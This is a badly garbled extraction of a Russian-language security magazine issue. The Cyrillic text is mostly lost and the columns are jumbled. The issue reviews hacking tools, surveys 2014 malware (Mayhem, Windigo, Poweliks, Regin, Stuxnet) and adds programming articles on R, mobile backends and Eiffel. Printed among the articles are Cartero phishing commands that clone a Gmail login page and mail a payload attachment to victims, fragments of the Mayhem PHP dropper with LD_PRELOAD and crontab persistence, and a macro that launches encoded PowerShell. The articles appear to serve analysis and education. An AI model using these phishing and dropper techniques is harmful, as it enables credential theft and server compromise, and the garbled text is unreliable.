bitbucket.org/mrexodia/titanhide).
4
ScyllaHide :
OllyDbg v1/v2;
x64_dbg;
Hex-Rays IDA v6+;
TitanEngine v2.
:
Process Environment Block (PEB);
NtSetInformationThread;
NtSetInformationProcess;
: npdunn
: Windows
URL: http://
sourceforge.
net/projects/
visualcodegrepp/
NtQuerySystemInformation;
NtQueryInformationProcess;
NtQueryObject;
NtYieldExecution;
NtCreateThreadEx;
BlockInput;
NtUserFindWindowEx;
NtUserBuildHwndList;
NtUserQueryWindow;
NtSetDebugFilterState;
NtClose;
Remove Debug Privileges;
Hardware Breakpoint Protection

(DRx);
Timing;
Raise Exception;
.
PE
x64
x64_dbg IDA. ,
ScyllaHide .
standalone .
(goo.gl/
hzY0hx).
: Matias P.
Brutti
: Linux
com/FreedomCoder/
Cartero
: clymb3r
: Windows
com/clymb3r/
KdExploitMe
MAILING PHISHING FRAMEWORK
KDEXPLOITME
VCG (Visual Code Grepper)

:
C++;
C#;
VB;
PHP;
Java;
PL/SQL.
Cartero CLI- Ruby.

Cartero ,
(,
Mailer, Cloner, Listener, AdminConsole),

.
,
gmail.com, :

. KdExploitMe ,

Windows .
, :
AttackWriteWhatWhere;
PoolOverflow;
AttackDecAddress;
KernelAdressLeak.

.
. , ,
,
.
, ,
.
:
, VCG.
, , . ,
, VCG, ,
grep .
.
./cartero Cloner --url https://

gmail.com --path /tmp--webserver
gmail_com./cartero Listener
--webserver /tmp/gmail_com -p 80
, Mailer
:
./cartero Mailer --data victims.json

--server gmail2 --subject "Internal
Memo" --htmlbody email_html.html --at
tachment payload.pdf --from "John Doe
<jdoe@company.com>"
Mongo, Cloner,
Listener, Servers, Templates, Mailer, WebMailer,
LinkedIn,
IMessage,
GoogleVoice,
Twilio,
AdminWeb, AdminConsole.
, .

. , .
ring 0 0day. ,
A Guide to Kernel Exploitation: Attacking the Core
:).
. Windows 7
Windows 8.1
Malware
01 /192/ 2015
,

.
.
? ?
malware? !
Lightspring@shutterstock.com
68
01 /192/ 2015
2014
69
JAVA,
Javafog , Java?

JRE, :
-
upload_* , ,
. . , Java, XOR
0x99 %server_url%/uploads/%file_name%;
. , cmd_UpdateDomain , Java, PC .
%TEMP%update.dat;
,
cmd_* , .
cmd.exe /c %%, ,
%server_url%/newsdetail.
Icefog, aspx?title=%host_id%.
.
Javafog,
Icefog, . IP-
, ,
,
. , .
,
, Icefog
, . -
Javafog , Icefog
, Java.
Icefog , ,
.
.
, 2014 .
Java-, .
DDoS-,
Icefog
Windows, Linux Mac OS. , Java. ( &):
JRE CVE-2013-2465.

Icefog 2011
tregubenko_v_v@tut.by
email, (Zoltan Balazs), CTO
;
MRG Effitas. Icefog 1 aspx-;
HEUR:Backdoor.Java.
Icefog 2 proxy;
Agent.a.
Icefog 3 & view.asp
update.asp;
,
Icefog 4 & upfile.asp;
Zelix Klassmaster. -, Zelix
Icefog-NG TCP- 5600 ( . Zelix
HTTP-).
, , ,
.
, OS X
%userprofile% Macfog.
. , , 2014 , ,
:
C&C Icefog lingdona.com, Windows HKEY_CURRENT_USER\Software\Microsoft\Windows\
, User-Agent
CurrentVersion\Run;
Java/1.7.0_40. ,
Linux /etc/init.d;
Java-. , Mac OS Mac OS launchd,
Icefog User-Agent

Internet Explorer.
.
, Javafog. , DDoS-
policyapplet.jar, , , %userprofile%
, , Javafog
jsuid.dat.
update.jar %TEMP%
, IRC, HKEY_CURRENT_USER\Software\Microsoft\Windows\
. CurrentVersion\Run.
IRC PircBot, .
,
. 1. User-Agent
.
70
Malware
01 /192/ 2015
DDoS-.
:
DDoS ( HTTP UDP flood);
;
;
DDoS .
HTTP flood User-Agent, ,
, . , , DDoS- (. 1).
, Java - . ,
-, JRE, : , , Java .
- Team Cymru ,
. , Team Cymru, ,
- DNS- . ,
DNS, .
, ,
.
, ,
. ,
, . , 2012 , Carna.
, OpenWRT.
Tripwire,
, , 80% -25 Amazon
, ,
. Tripwire, 30% 46%
,
.
, , . ? .
,
.
,

.
LINUX?
,
(. Government
, SOHO,
Communications Headquarters, GCHQ) , Linux
.
,
, .

. ,
, . 1919
SANS ,
Linksys.
(. Government Code and Cypher
*nix- The Moon,
School, GC&CS).
. ,
.

Lunar
1946 .
. , Industries The Moon 2009
GCHQ NSA,
*nix-
.
1952 . .
. ,
Windows 80 Tempora
: E4200, E3200, E3000,
, *nix E2500, E2100L, E2000, E1550,
-,
,
E1500, E1200, E1000 E900.
.

, E300,
.
WAG320N, WAP300N, WES610N,
2014 WAP610N, WRT610N, WRT400N,
WRT600N, WRT320N, WRT160N,
,
WRT150N.
*nix-.

ESET URL- "/HNAP1/", XML- , Windigo.
.
2011 ,
Home Network Administration Protocol, Cisco , cPanel ( . ) kernel.org,
, The
Linux.
Moon CGI- Windigo ESET CERT-Bund, . CGI- SNIC
, admin
(CERN).
, .
- , ELF
Linux,
(Executable and Linkable), MIPS.
,
The Moon . . 670
.
( /21 /24), .
Windigo
SANS, , :
, Linux/Ebury root backdoor shell, . ,
, . The Moon
SSH, Linux, FreeBSD-;
, ,
Linux/Cdorked - Linux,
SANS.
, , Windows,
. , 300 ? Apache httpd, nginx lighttpd;
.
GCHQ
01 /192/ 2015
71
2014
Linux/Onimiki DNS- Linux, ,

, IP-,
;
Perl/Calfbot -, Perl.
fclose($f);
}
print "SO dumped ".le_put_contents("./libworker.so",
$so)."\n";
if (getenv("MAYHEM_DEBUG"))
exit(0);
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
/* second stage dropper */
$HBN=basename("/usr/bin/host");
$SCP=getcwd();
$SCR ="#!/bin/sh\ncd '".$SCP."'\nif [ -f
'./libworker.so' ];then killall -9 $HBN;
export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/
bin/host\nunset LD_PRELOAD\n";
$SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\
n\nrm 1.sh\nexit 0\n";
@le_put_contents("1.sh", $SCR);
-, Linux/Cdorked, Windows ( 2013- Blackhole,

Neutrino),
, Win32/Boaxxe.G Win32/
Glupteba.M, .
SSH ,
. SSH, Linux/Ebury:
.

Windigo,
.
. 2. Windigo
root,
- Perl/Calfbot.
( root)
Linux/Ebury.
-, Linux/Cdorked.
,
Linux/Cdorked, , 25 .
ESET ,
,
Windigo,
:
,
, ,
Linux.
,
Mayhem.

libworker.so, .
PHP-, -.
<?php
header("Content-type: text/plain");
print "2842123700\n";
if (! function_exists('le_put_con
tents')) {
function le_put_contents
($lename, $data) {
$f = @fopen($lename, 'w');
if (! $f)
return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
@system("killall -9 ".basename("/usr/bin/host"));
$so32 = <hex_body_of_library_for_x32>;
$so64 = <hex_body_of_library_for_x64>;
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
$arch = 32;
print "Arch is ".$arch."\n";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
$n = unpack("C*", fread($f, 8));
$so[7] = sprintf("%c", $n[8]);
print "System is ".($n[8] == 9 ? "FreeBSD" :
"Linux")."\n";
@chmod("1.sh", 0777);
/* try at now, le will be removed, crontab cleaned on suc
cess */
@system("at now -f 1.sh", $ret);
if ($ret == 0) {
for ($i = 0; $i < 5; $i++) {
if (! @le_exists("1.sh")) {
print "AT success\n";
exit(0);
}
sleep(1);
}
}
@system("(crontab -l|grep -v crontab;echo;echo '* * * * *
".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) {
for ($i = 0; $i < 62; $i++) {
if (! @le_exists("1.sh")) {
print "CRONTAB success\n";
exit(0);
}
sleep(1);
}
72
Malware
01 /192/ 2015
ELF IptabLes IptabLex. /boot,

PHP- ? : /usr. IptabLes ( 1 ) CMS ( Google
IptabLex ( 700 ), WordPress), , root.
. ,
.
FTP , FTP .
, .
, PHP- .
/etc/rc.d/
(x86 x64)
init.d, . . ,
-, Mayhem.
Linux, Debian, Ubuntu, CentOS Red Hat.
killall
DDoS SYN flood DNS flood. /usr/bin/host ( ) ,
(x86 x64).
system() /usr/bin/host 119 / 110 .
LD_PRELOAD=libworker.so, libworker.
, DDoS- 2014 .
so exit().
DDoS-
Mayhem .sd0,
Linux.BackDoor.Fgt.1.
FAT ,
. Linux. FAT16/32 File System Library (fat_filelib).
, MIPS SPARC.
.
:
IP- libworker.so ;
LD_PRELOAD
,
;
DNS amplification;
. UDP flood;
SYN flood;

;
Mayhem.
.
(. National Security Agency, NSA)

, ,
. -
.
, (. No Such Agency). : URL .
, NSA
,
256
. NSA
. IP-,
,
, . IP
, ,
,
,
, Mayhem
,
. , ,
.
.
, , ,
Telnet
, -, - , :

,
,
. .
Remote File Inclusion;
(root,
NSA SELinux,
admin), .
Linux.

Linux .
WordPress,
, ;

(root, admin, 12345). Joomla
WordPress;
IP-, ,

CMS- ISP-;
bash-, , ,
.
.
, ;
,
FTP-;
Linux-
IP-;
Windows, . , ...
- MySQL (phpMyAdmin);
POWERSHELL
Heartbleed ShellShock.
, . , , . .

Trend Micro Symantec . ,
,
1400 .
Microsoft Word Excel.
Akamai Technologies Crigent ( Power Worm).
Linux- IptabLes/IptabLex,
Windows PowerShell.
DDoS-. , , Microsoft Excel
Apache Struts, Apache Tomcat
:
Elasticsearch.
}
print "Running straight\n";
@system("./1.sh");?>
NSA
01 /192/ 2015
73
2014
Private Sub Workbook_Open()

b = "JwBDAEkWORMBODYHERE" _
& "QA7ACcAcgWORMBODYHERE" _
& "BzACgAKQAWORMBODYHERE" _
& "jAGUAIAAtWORMBODYHERE" _
& "ACAAUwB5AWORMBODYHERE" _
& "GcALgBpAGWORMBODYHERE" _
& "4AIAAtAGEWORMBODYHERE" _
& "AdAAuAHAAWORMBODYHERE"
Set a = CreateObject("WScript.Shell")
a.Run "powershell.exe" & " -noexit
-encodedcommand" & b, 0, False
End Sub
. 3. Poweliks
. 4. Poweliks
, , .
, .
, PowerShell- Base64, powershell.exe
. , , .
powershell.exe
- Base64 . ( ) ( ).
CompileAssemblyFromSource(), CSharp
. rundll32.exe , rundll32. ,
.
Crigent ,
Tor.
Dropbox OneDrive ,
, , Tor-, Polipo. : DNS DNS- Google nslookup -querytype=TXT
{malicious domain} 8.8.8.8,
Tor Polipo.
Tor , Crigent PowerShell . ,
. 5. Regin
, Word Excel
, , ,
. docx xlsx, Crigent
, doc xls , . ,
. , Power Worm.
Power Worm , PowerShell.
Poweliks. PowerShell, .
Poweliks ,
, , , .
Poweliks RTF CVE-2012-0158 ( Microsoft MS12-027).
PowerShell,
Microsoft KB968930.
(. 3).
, ASCII-;
, , (. 4).
JScript, \\HKCU\software\microsoft\windows\currentversion\run\(default).
JScript Base64- PowerShell- (,
Power Worm), . , , DLL, .
DLL, MPRESS 2.19, NtQueueApcThread dllhost.exe
. : -
74
Malware
NTFS Alternate Data Streams, , MoveFileEx() MOVEFILE_DELAY_UNTIL_REBOOT.

Poweliks, ,
.
, malware-, Kafeine ( malware.dontneedcoffee.com), , Poweliks Alureon.GQ (Microsoft),
Wowlik (ESET). ,
, , , TDL TDSS.
,
(,
,
). Kafeine ,
, C&C Poweliks, downgrade
, Alureon.GQ.
2014-
Poweliks
30 ( 2013 ). ,

Microsoft Word.
01 /192/ 2015
.
:
x86 NTFS Alternate Data Streams;
x86 FAT ;
x64 .
20 RC5 16-
NRV2e.
x86
VMEM.sys,

(EVFS). Regin,
,

- evt
imd,
, C:\Windows\System32.
- FAT, ,
,
16- 6
RC5
NRV2e. VMEM.sys . 6. Regin
EVFS-
disp.dll ( ),
-,
, Stuxnet.
,
- , , ? 2014 Symantec
.
Kaspersky white paper Regin.
x64 disp.dll,
- , .
EVFS, ? , . ( VMEM.sys), disp.dll , Symantec, Kaspersky (
EVFS, .
2014-. . .) (
:
). , HTTP HTTPS, cookie;
Regin, (. 5).
RAW sockets, TCP UDP;
, .
ICMP, ping shit,
64-
31 337;
Microsoft Broadcom. SMB.
CA ,
.
.
- Regin
Regin, . Regin
( ). x86- x64-.
.
x86 ( ),
, Regin , .
.
NTFS,
( :
) Alternate Data
Streams :
. 7. Stuxnet
%Windir%;
%Windir%\fonts;
%Windir%\cursors.
FAT,
.
,

. x64
,
. ,
,
, XOR.

() ,
01 /192/ 2015
75
2014
;
;
;
;
;
HTTP/SMTP/SMB.
, .
( ), . , .
. , Symantec
Regin 12 2013 . Microsoft 9 2011 . F-Secure
:
Regin 2009 . ,
(RAW) NTFS / , , 2003 .
;
IP- (TCPDump);
: , Stuxnet, Duqu Regin
;
. ,
LM database;
. MS Exchange;
.
IIS;
: AES , RC4 , ? ,

.
,
, Stuxnet.
GSM.
zero
victims (
.
patient zero, ,
).
70 , Stuxnet ?
, 2008
JAVA - ,
, ,
Ericsson OSS MML.
.
.
Symantec, 28%
.
ERP -
, Java Runtime Environment (
, 48%
),
.
: ,
.
IP-.
( ) , ,
, ,
: , .
( ) zero
, victims. ,
(.
,

. 6).
60- . ,
:
.
Symantec Domain A Foolad Technic
*nix-
- The Intercept
Engineering Co.;
.
Domain B Behpajooh Co. Elec
,
,
& Comp. Engineering;
?
Domain C Neda Industrial
, DDoS-
, Group;
, ,

Domain D Control-Gostar
.
(Secret Malware in European Union
Jahed Company;
,
Attack Linked to U. S. and British
Domain E Kalaye Electric Co.
, Java PowerShell
Intelligence).

,
. ,
, Foolad Technic Engineering Co.
.
NSA/GCHQ State sponsored malware, ,

, .
,
Stuxnet .
.
.
,
,
Belgacom GCHQ
Stuxnet

,
. , ,
. , (,
.
) :). , ,
.

. ,
.
.

, ! , ,
(fingerprint) , IP-,
, .
, email .
Stuxnet.
,
,

NSA/GCHQ. ,
-

fingerprint,
.
. Behpajooh Co. Elec & Comp. Engineering ,
, -
Stuxnet ,
, -.
.
Belgacom. , Stuxnet Symantec W32.
, -
Stuxnet Dossier ver. 1.4 2011 . ,
(Jean-Jacques Quisquater), , ,
. The Intercept Regin
Domain A, B, C, D, E?
NSA/GCHQ.
.
76
Malware
01 /192/ 2015
2014

][
(, )
- . ,
, .
:
:). , , . ! ,

.
,

][. ,
Node.
js, Erlang,
,
][,
,
Malware,
,
,

-
Deeonis,
-
Malware

,

++ , ,
,
Malware,

lozovsky@glc.ru
,

X-mobile, ,
Plan 9
:)
01 /192/ 2015
77
2014
, ,
WIN, MAC
( INTERNET SECURITY, )

. Linux Mint
,
Windows 7 x64,
,
.
,

PeStudio, . ,

, omodo
Nod32.

(Kaspersky),
,
, .

, ( ) - , .

security-, , .
,
-
. : ,
, , , :).
-
, , . Dr.Web, ESET, Essential, Avast .
- , -
(
). , ,
VirusTotal, - , . , ,
, ,
. KIS,
. ,
. ,
,
- .
,
, VirtualBox,
Kali, IDA, OllyDbg + ImmunityDebugger, VS, WinHex, PEiD,
ProcessExplorer, :).
KIS Dr.Web.
, ,

. 1998 :).
,
, ,
.

ArchLinux,
,
docker/lxc. Windows
, . - ,
, VirtualBox.

Windows, :
.
,
. , ,
. :).
Deeonis
,
Windows-,
Microsoft Security
Essentials. ,
. ,
Windows
MS,
MS.

:).
Security Essentials
, .
Microsoft ,

API.
78
Malware
01 /192/ 2015
:

. , ?
Deeonis
Android Dr.Web:
APK ,
SMS , .
Dr.Web. ,
, .
,

, , , ,
.
,
Windows Phone.
. Android (
1.5),
,
, -
- .
, .
,
,
Motorola Defy
SIM-
AOSP
Nexus 4. //
Avast. ,
. iOS, , .

(, , IDA
)

, , VirtualBox, Kali, IDA, OllyDbg +
ImmunityDebugger, VS, WinHex, PEiD, ProcessExplorer,
:). ? , ,
( , ...) . VirtualBox . Kali Linux must have,
, ,
, , . IDA + Olly + Immunity + PEiD
, , , . VS IDE
. WinHex , , ,
. ProcessExplorer ,
, .
01 /192/ 2015
79
2014

, , ( ) . , -
2000-,
, ,
, ,

, Norton Ghost
.
,

100% . ,
15

( 40 , - , :)).
,
,

. -
Debian,
OS X,
.
- , -
. , /sensitive
.
:
Dropbox;
Google Drive;
Amazon Glacier/S3;
Digital Ocean;
GitHub.
. , DB
fast-read ,
. Google
Drive , , ,
review. S3

,
Glacier. ,

,
,
,
.
, ,
. ,
-

, private
network SSL ,
bash-.
,
c
docker-,
, , (, , ,
Flash
,
). ,

backup- Time Machine. , :).
, , , :
?
!
,

. ,
.
ASAP
endpoint .
Deeonis
, .
backup-,
Comodo
Comodo Backup (
).
. ,
,
.

*nix . , , ,
iptables ,
. SELinux, ,
. docker/lxc, docker Chromium Tor.
. .
, , Hardened Gentoo ,
, , .

NoScript
Mozila. ,
.
80
Malware
01 /192/ 2015

/ / : ,

,

//,

,
.
(, , )
.
KIS

.
Avast.
: KIS. , ,
:),

. ( Core i3 Ivy
Bridge, 4 RAM, SSD),
.
Dr.Web Light.
Avast, .
Avast (, ,
:)) ,
.
Trend Micro,
, .
:).
,
, , :). ,
- .
Avast
omodo. Avast
. Comodo ,

,
.
Comodo,
. , ...
Deeonis

Windows Ubuntu.
, Nod32.
, , .
Dr.Web CureIt.

Ubuntu. 99% , , Wine.
01 /192/ 2015
2014
,
MALWARE
, . , , , . ,
IT, , .
, , , ,
USB-. ,
, .
, 50% malware ,
, , . : ,
temp, 90 malware . , , . ?
. ,
IT.
, ,
.
. , malware,
, ,
. , , . Kaspersky
Dr.Web .
, . Avast Avira,
.

. - Dr.Web :
, , . . , ,
. , 200 , .
Kaspersky . Kaspersky
, , . ,
- -
ESET,
, , . ,
.
,
, ,
, .
Avast , , ,
, .
Comodo , ,
.
sandbox,
.
sandbox , .
81
82

, R. R .
-
,
( ). , Shiny (shiny.rstudio.
com), - R.
, R , .
. -
, R
, , ,
:).
R,
(
), .
01 /192/ 2015

vitaly@betamind.ru
, ,

R , , . ,
, ? help,
.
, ? _ .
,
. ,
, ,
.
R ,
,
R , . , . ,
? , 10.
.
:
;
();
;
;
.
R , .
R, , , ,
L. , 10L.
:
> x <- 1
> typeof(x)
[1] "double"
> y <- 1L
> typeof(y)
[1] "integer"
, ,
: ,

, . ,

REPL (Read Evaluate Print Loop).
print
- .
, [1] 10,
R, , ( ) .
1
. ,
,

,
.
c:
> x <- c(1,2,3)

> x
[1] 1 2 3
,
, :
>, .

Inf .
<-. :
> x <- 10
> x
[1] 10
> print(x)
[1] 10
83
01 /192/ 2015
> x <- c(1:3)

> x
[1] 1 2 3
, ,
. , , . typeof.

x <- 1:3. R TRUE FALSE T F.
, vector.
> x <- vector("numeric", length = 10)

> x
[1] 0 0 0 0 0 0 0 0 0 0
> length(x)
[1] 10
R
:
> x
> x
[1]
> y
> y
[1]
<- c("a", TRUE, 1.3)

"a"
"TRUE" "1.3"
<- c(2, TRUE, FALSE)
2 1 0

.
:
> as(TRUE, "character")

[1] "TRUE"
> as.character(TRUE)
[1] "TRUE"
,

.
, , . (
) character(length=5),
length , is.character
, as.character
. ,
NA.
,
:
> v <- c(x = 1.0, y = 2.5, z = -0.1)

> v
x
y
z
1.0 2.5 -0.1
84
> u <- c(1.0, -0.5, -0.5)

> names(u) <- c("x", "y", "z")
,
.
matrix:
> m <- matrix(nrow = 2, ncol = 3)

> m
[,1] [,2] [,3]
[1,]
NA
NA
NA
[2,]
NA
NA
NA
, . , dim:
> dim(m)
[1] 2 3
> attributes(m)
$dim
[1] 2 3
, (, )
: , , C Java,
, , , ,
FORTRAN R. , ,
:
> m <- matrix(1:6, nrow = 2, ncol = 3)

> m
[,1] [,2] [,3]
[1,]
1
3
5
[2,]
2
4
6
, dim :
> v <- 1:6

> dim(v) <- c(2, 3)
> v
[,1] [,2] [,3]
[1,]
1
3
5
[2,]
2
4
6
,
:
> m <- matrix(1:4, nrow=2, ncol=2)

> dimnames(m) <- list(c("a", "b"),
c("c", "d"))
> m
c d
a 1 3
b 2 4
R
:
> x <- 1:3

> y <- 11:13
> cbind(x, y)
x y
[1,] 1 11
[2,] 2 12
[3,] 3 13
> rbind(x, y)
[,1] [,2] [,3]
01 /192/ 2015
x
y
1
11
2
12
3
13
, , ,
.

. , , . ,
.
, , ,
R :
> lst <- list("hello", 1.5, TRUE, 1+2i)

> lst
[[1]]
[1] "hello"
[[2]]
[1] 1.5
[[3]]
[1] TRUE
[[4]]
[1] 1+2i
, , : , , . ,
:
> l <- list(a="test", b=3.14)

> l
$a
[1] "test"
$b
[1] 3.14

. ,
,

. ,
. R

:
> x <- factor(c("yes", "no", "yes",

"no", "no"))
> x
[1] yes no yes no no
Levels: no yes
: yes no. ,
, , :
> table(x)
x
no yes
3
2
(DATA FRAME)
R.
, . ,

.
, (). -
CSV-
read.csv,
.
, :
> x <- data.frame(a=c(F, F, T, T),

b=c(F, T, F, T), or=c(F, T, T, T))
> x
a
b
or
1 FALSE FALSE FALSE
2 FALSE TRUE TRUE
3 TRUE FALSE TRUE
4 TRUE TRUE TRUE
names,
row.names:
> names(x)
[1] "a" "b" "or"
> row.names(x)
[1] "1" "2" "3" "4"

,
, ,
,
.
, , :
> x <- c(11, 21, 31, 41, 11, 21, 31)

> x[1]
[1] 11
> x[2]
[1] 21
> x[x > 21]
[1] 31 41 31
> j <- x > 21
> j
[1] FALSE FALSE TRUE TRUE FALSE
FALSE TRUE
> x[j]
[1] 31 41 31
> x[1:3]
[1] 11 21 31
, , , ,
>
, .

, . , x[2,3]
, x[1,]
z[,2]
.
, ,
, ,
- , ,
x[1, ,drop=FALSE].

. :
> l <- list(a=0.5, b=1:3)

> l$a
[1] 0.5
> l$b
[1] 1 2 3
> x <- l[2]
> x
01 /192/ 2015
85
$b
[1] 1 2 3
> typeof(x)
[1] "list"
> y <- l[[2]]
> typeof(y)
[1] "integer"
> y
[1] 1 2 3

R.
, [[]]
, []
. $ [[]] .
, $ .
,
, : x[[1]][[3]], ,
c. ,
x[[c(1, 3)]].

( ).

, R ,

.
,
, .
. , R ,
-:
if (x > 0) { y <- x } else { y <- -x }

, else . . ,
z <- if (x < 0) -x , x > 0 NULL.

is.null.
. R ,
, . R
. for,
for-in.
x <- c("a", "b", "c", "d", "e")

for(i in 1:5) {
print(x[i])
}
for(ch in x) print(ch)
, for-in , ,
- ,
,
.
R seq_along, ,
.
, for(i in seq_along(x)) { ... }.
,
seq_len.
, , length. while while (cond) { ... }.
R : &&, || !.
while(TRUE) R
repeat { ... }, , , if
break.
next.
R
.

Haskell, if , ,
, . R

:
y <- if (x > 0) { x } else { -x }

#

,
,
. else . ,
,
R .
?
:
f <- function(<args>) {
...
}
, R
(first-class
object). ,
. ()
:
f <- function(g) {
function(x) g(g(x))
}
y <- f(function(x) x * x)(5)
f g ,
x
g.

, (
g ) 5.
, 5
.
R
(lazy), , :
> f <- function(x, y) x * x

> f(3)
[1] 9
> f(3, 5/0)
[1] 9
,
<<-. :
counter <- function() {

i <- 0
function() {
i <<- i + 1
i
}
}

, :
> counter_one <- counter()

> counter_two <- counter()
> counter_one()
[1] 1
> counter_one()
[1] 2
> counter_two()
[1] 1
, ,
<<- ,
1.
R .

( ):
> f <- function(x, y=1) x + y

> f(y=2, x=5)
R
, .

R
.
86
01 /192/ 2015
MBAAS

( )
, .
backend as a service (BaaS)
,
BaaS Mobile BaaS
(MBaaS). MBaaS-
,

.
, ,
, .

MBaaS, .
, , , Angry
Birds, :).
. , Unity3D/C#, Windows, Android iOS. ,
-.
.
?
MBAAS
. ,
WPA
2011- , 28 .
.
Wikileaks ,
DDoS-. .
MBaaS-, Unity3D. BaaS-

, SDK Android iOS,
,
.
?
; , , , GPS. -
Unity3D
,

(Android, iOS, Windows Phone).
, :
#if UNITY_ANDROID
AndroidJavaObject TM = new AndroidJavaObject
("android.telephony.TelephonyManager");
string IMEI = TM.Call<string>("getDeviceId");
:
My Life Graphic@shutterstock.com

infiltration.ru
MBaaS- , :
1. MBaaS-.
2. ,
, .
3. .
4. , .
5. API (
) .
6. MBaaS , .
01 /192/ 2015
87
MBaaS
string IMEI = SystemInfo.deviceUniqueIdentier;
(delegate(ActionUserSignin action) {
if(action.getCode() == StatusCodes.SUCCESS) {
//
// ...
} });
READ_PHONE_STATE, .

MBaaS-, , ,

:
, ,
.
GameSparks.com
The #1 Backend-as-a-Service platform
for games, . ,
, SDK unitypackage
.
: API Key API Secret
( ),
. Unity3D GameSparks.
: iOS, Android,
JavaScript, Marmalade, Cocos2d, Flash . Unity3D
SDK, , , : , , ,
. Unity SDK 2 GameSparks
,
.

NGUI . ,
, NoSQL,
, , .
GameSparks : . , MBaaS-
.
GameSparks
20 , 20
20 API .
, .
WARNING
,

,

,

,
- .

,

MBaaS-,

KumakoreApp app = new KumakoreApp

("b99418973e694ec8ce45a53bf712a79", "0.0", 1415103791);
:
app.signin("kumasun3157","password").sync
//
Dictionary<string,object> data = new
Dictionary<string, object>();
data.Add("phone_num", "123-45-67");
//
.

string type = "phone";
string name = "lox";
ActionDatastoreCreate action2 = app.getUser()
.getDatastore().create(type, name, data);
action2.sync(delegate(ActionDatastoreCreate a) {
if(a.getCode() == StatusCodes.SUCCESS) {
//
!
} });
( )
,
, . , : 500 API
push- .
Kii.com
, .
- . , , (
), .
SDK , , , , . SDK DLL, JSON-.
Assets ,
.
Application ID, Application Key Site
( ).
.
Kumakore.com
SDK Unity, Android, iOS, , , REST API. ,
SDK GitHub . Unity3D
: SDK unitypackage,
. . Hello world . (
), .
Kumakore , ,
:
Kumakore ,
, .
Global Object, . app
getUser(), getDatastore()

:
INFO

,
, ,

Droid Watcher
Android Spy Application
GitHub.
KiiUser user = KiiUser.BuilderWithName

("username").Build ();
user.Register("password", (KiiUser user2,
Exception e) =>
{
if (e != null)

{ //
return;
}
//
!
});
JSON-.
.
KiiBucket bucket = Kii.Bucket("spy_table");

// , :
KiiObject kiiObj = bucket.NewKiiObject();
kiiObj["phone_num"] = "123-45-67";
88
01 /192/ 2015
kiiObj["money"] = 500;
kiiObj.Save((KiiObject obj, Exception e) =>
{
if (e != null)
{
//
}
else
{
//
!
}
});

, JavaScript. , ( , ),
:
KiiServerCodeEntry entry = Kii.

ServerCodeEntry("main");
entry.Execute(...);
1
API push-
.
. 1. ,
Yahoo
DatabaseObject obj_db = new DatabaseObject();

obj_db.Set("phone_num", "123-45-67");
obj_db.Set("money", 500);
3- . Gamesnet.Yahoo.net
PlayerIO.com, Yahoo
, ,
150 . Yahoo Games Network,
,
- PlayerIO.
Android Java, iOS/Objective-C, Unity3D/.NET,
ActionScript. , ,
,
ActionScript, , , . Visual Studio 2010.
. Yahoo NoSQL-
BigDB. Yahoo
. BigDB
(, xtable).
,
,
.
SDK Unity3D
, DLL
PlayerIOUnity3DClient.dll.

PlayerIOClient.PlayerIO.Connect(
"test-emwr9sy8ohefq9ce7mbsb7",
"public",
"user-id",
null,
null,
null,
delegate(Client client) {
//
},
delegate(PlayerIOError error) {
//

Debug.Log(error.Message);
});
Game ID ( "user-id").

.
client.BigDB.CreateObject("xtable",
"user-id", obj_db,
delegate (DatabaseObject result)
{ result.Save(null); });
Yahoo.

,
. ,

Yahoo.

Visual Studio, DLL,

. , , .
2- . Api.Shephertz.com (App42)
. 2. ,
App42
- : ,
01 /192/ 2015
89
MBaaS
. :
,
.
App42 Cloud API , .
: (, ,
, , , , ,
) ( , ,
, -,
, ).
.
App42
JSON- SDK,
SimpleJSON.
,
-
.
. 3. ,
Parse
ServiceAPI cloudAPI;
StorageService storageService;
try
{
//
:
cloudAPI = new ServiceAPI
("27bba692c71f3ece89767", "05747459e61b39");
//

:
storageService = cloudAPI.BuildStorageService();
}
catch(Exception)
{ //
storageService = null;
}
TestObject , Data Parse .

Parse:
ParseQuery<ParseObject> query = ParseObject.

GetQuery("TestObject");
query.GetAsync("v3unymsLIv").ContinueWith(t =>
{
ParseObject testObj = t.Result;
Debug.Log(testObj["phone"]);
});
GetAsync()
(objectId), .
JavaScript,
. ,
Parse.com : 20 , 2 , 30
API (2,67 ) .
try {
JSONClass jsonobj = new JSONClass();
jsonobj.Add("phone_num", "123-45-67");
jsonobj.Add("money", 500);
//
spy_table
spy_info:
storageService.InsertJSONDocument
("spy_table","spy_info", jsonobj);
//
!
}
catch(App42Exception )
{
//
}
Java.
API , push-, 1
1
1- . Parse.com
,
, .
2011 ,
, Parse 85
, . , Dropbox, Google Yahoo!
Parse.com .
, Parse,
Keys . Unity3D,
Parse.Unity.dll. , Parse Initializer Application ID .NET Key.
,

Parse:
ParseObject testObject = new

ParseObject("TestObject");
testObject["phone"] = "123-45-67";
testObject["money"] = 500;
testObject.SaveAsync();
WWW
MBaaS:
appcelerator.com
(iOS, Android, Titanium,
REST API);
kumulos.com
(iOS, Android);
kinvey.com
(iOS, Android, HTML5,
REST API)
. , , QuickBlox,
Unity3D, -
Amazon S3. ,
Asset bundles Pro Unity.
, Unity3D,
REST
API. , , Google Cloud, Amazon Cognito
iOS, Android Fire.
gamedev Photon (exitgames.com),
Photon Cloud , - PC-.
3D-
,
. ,
.
, ,
.
Photon, .
90
01 /192/ 2015

,

BOEING
EIFFEL
,
, Eiffel.
.

, ,
. -
Eiffel, 1985 .
( ), ,
, ,
( -).
ISE
(Interactive Software Engineering), , (1993 ) Eiffel Software.
500 -
. ,
. ,
. / : Python
open source ; C/C++

, , , AT&T (Bell Labs),
( ); Pascal,
Lua ... , , Objective-C,
NeXT, , , Apple.
Eiffel ,
: , - Eiffel Sofware
Boeing, Rosenberg EMC.
( Eiffel Software, ) , ,
C
; .
, Eiffel. , open
source Visual Eiffel,
2007 . ,
EiffelStudio.
travellight@shutterstock.com
yurembo ,

yazevsoft@gmail.com
01 /192/ 2015
Windows,
. Mac OS UNIX.
, . ? Java? Mono? . Eiffel. .
91
92
, , . ,
,
, ,
: Pascal, Ada, Oberon. ! . ,
,
, , Hello, World. Eiffel ,
. . (
) , -. , (client), -
(supplier), ,
. , ,
, , , .
,
, , ,
, ,
. . ,
EiffelStudio . ,
. .
.
. ,
()
: .
EiffelStudio
